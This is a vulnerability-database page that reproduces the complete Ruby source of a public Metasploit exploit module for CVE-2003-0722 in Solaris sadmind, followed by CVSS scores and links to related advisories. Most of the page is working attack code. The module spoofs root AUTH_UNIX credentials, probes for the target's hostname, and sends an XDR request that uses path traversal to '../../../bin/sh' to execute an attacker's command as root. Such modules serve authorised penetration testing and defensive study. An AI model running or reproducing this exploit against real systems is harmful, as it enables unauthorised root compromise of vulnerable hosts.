Lucene search
Vlad902 <[email protected]>, hdm <[email protected]>, cazz <[email protected]>, midnitesnakeMSF:EXPLOIT-SOLARIS-SUNRPC-SADMIND_EXEC-HistoryApr 04, 2008 - 9:15 p.m.
Solaris sadmind Command Execution
2008-04-0421:15:55
vlad902 <[email protected]>, hdm <[email protected]>, cazz <[email protected]>, midnitesnake
www.rapid7.com
13
CVSS2
10
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
AI Score
7.4
Confidence
Low
This exploit targets a weakness in the default security settings of the sadmind RPC application. This server is installed and enabled by default on most versions of the Solaris operating system. Vulnerable systems include solaris 2.7, 8, and 9
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::SunRPC
def initialize(info = {})
super(update_info(info,
'Name' => 'Solaris sadmind Command Execution',
'Description' => %q{
This exploit targets a weakness in the default security
settings of the sadmind RPC application. This server is
installed and enabled by default on most versions of the
Solaris operating system.
Vulnerable systems include solaris 2.7, 8, and 9
},
'Author' => [ 'vlad902 <vlad902[at]gmail.com>', 'hdm', 'cazz', 'midnitesnake' ],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2003-0722'],
['OSVDB', '4585'],
['BID', '8615']
],
'Privileged' => true,
'Platform' => %w{ solaris unix },
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 2000,
'BadChars' => "\x00",
'DisableNops' => true,
'EncoderType' => Msf::Encoder::Type::CmdPosixPerl,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet',
}
},
'Targets' => [ ['Automatic', { }], ],
'DisclosureDate' => '2003-09-13',
'DefaultTarget' => 0
))
register_options(
[
OptString.new('HOSTNAME', [false, 'Remote hostname', nil]),
OptInt.new('GID', [false, 'GID to emulate', 0]),
OptInt.new('UID', [false, 'UID to emulate', 0])
], self.class
)
end
def exploit
sunrpc_create('udp', 100232, 10)
sunrpc_authunix('localhost', datastore['UID'], datastore['GID'], [])
if !datastore['HOSTNAME']
print_status('attempting to determine hostname')
response = sadmind_request(rand_text_alpha(rand(10) + 1), "true")
if !response
print_error('no response')
return
end
match = /Security exception on host (.*)\. USER/.match(response)
if match
hostname = match.captures[0]
print_status("found hostname: #{hostname}")
else
print_error('unable to determine hostname')
return
end
else
hostname = datastore['HOSTNAME']
end
sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])
response = sadmind_request(hostname, payload.encoded)
sunrpc_destroy
if /Security exception on host/.match(response)
print_error('exploit failed')
return
else
print_status('exploit did not give us an error, this is good...')
select(nil,nil,nil,1)
handler
end
end
def sadmind_request(host, command)
header =
Rex::Encoder::XDR.encode(0) * 7 +
Rex::Encoder::XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10,
4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0,
host, 'system', '../../../bin/sh')
body =
do_int('ADM_FW_VERSION', 1) +
do_string('ADM_LANG', 'C') +
do_string('ADM_REQUESTID', '00009:000000000:0') +
do_string('ADM_CLASS', 'system') +
do_string('ADM_CLASS_VERS', '2.1') +
do_string('ADM_METHOD', '../../../bin/sh') +
do_string('ADM_HOST', host) +
do_string('ADM_CLIENT_HOST', host) +
do_string('ADM_CLIENT_DOMAIN', '') +
do_string('ADM_TIMEOUT_PARMS', 'TTL=0 PTO=20 PCNT=2 PDLY=30') +
do_int('ADM_FENCE', 0) +
do_string('X', '-c') +
do_string('Y', command) +
Rex::Encoder::XDR.encode('netmgt_endofargs')
request = header + Rex::Encoder::XDR.encode(header.length + body.length - 326) + body
ret = sunrpc_call(1, request)
return Rex::Encoder::XDR.decode!(ret, Integer, Integer, String)[2]
end
def do_string(str1, str2)
Rex::Encoder::XDR.encode(str1, 9, str2.length + 1, str2, 0, 0)
end
def do_int(str, int)
Rex::Encoder::XDR.encode(str, 3, 4, int, 0, 0)
end
end
Related
saint
saint
sadmind AUTH_SYS authentication vulnerability
2006-01-09 00:00:00
sadmind AUTH_SYS authentication vulnerability
2006-01-09 00:00:00
sadmind AUTH_SYS authentication vulnerability
2006-01-09 00:00:00
nessus
nessus
Solaris sadmind AUTH_SYS Credential Remote Command Execution
2003-09-19 00:00:00
cve
cve
CVE-2003-0722
2003-09-22 04:00:00
securityvulns
securityvulns
[UNIX] Remote Root Exploitation of Default Solaris sadmind Setting
2003-09-16 00:00:00
exploitdb
exploitdb
Solaris Sadmind - Command Execution (Metasploit)
2010-06-22 00:00:00
Solaris Sadmind - Default Configuration Remote Code Execution
2003-09-19 00:00:00
nvd
nvd
CVE-2003-0722
2003-09-22 04:00:00
canvas
canvas
Immunity Canvas: SADMIND
2003-09-22 04:00:00
packetstorm
packetstorm
Solaris sadmind Command Execution
2009-10-28 00:00:00
cvelist
cvelist
CVE-2003-0722
2003-09-17 04:00:00
seebug
seebug
Solaris 7 8 9 sadmind RPC Command Execution
2010-01-10 00:00:00
cert
cert
Sun Solstice AdminSuite ships with insecure default configuration
2003-09-19 00:00:00
CVSS2
10
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
AI Score
7.4
Confidence
Low
Related for MSF:EXPLOIT-SOLARIS-SUNRPC-SADMIND_EXEC-